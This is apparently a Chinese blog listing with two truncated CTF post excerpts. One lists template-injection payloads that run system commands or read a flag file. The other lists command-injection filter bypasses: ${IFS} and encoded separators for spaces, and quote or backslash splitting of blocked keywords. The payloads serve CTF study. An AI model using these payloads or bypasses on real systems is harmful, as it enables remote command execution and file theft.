摘要： 前言： 1.常用payload{if phpinfo()}{/if}{if system('ls')}{/if}{if readfile('/flag')}{/if} {if show_source('/flag')}{/if}{if system('cat ../../../flag')}{/if 阅读全文

摘要： 考察知识点: 文件执行漏洞 空格特殊字符、flag字符绕过空格绕过 ${IFS} ${IFS}$1 $IFS$1 <和<> {cat,flag} %20替换 %0a （换行） %0d （回车） %09 （tab黑名单(关键字）绕过单引号、双引号绕过：c"at"t fl''ag反斜线绕过：ca\t f 阅读全文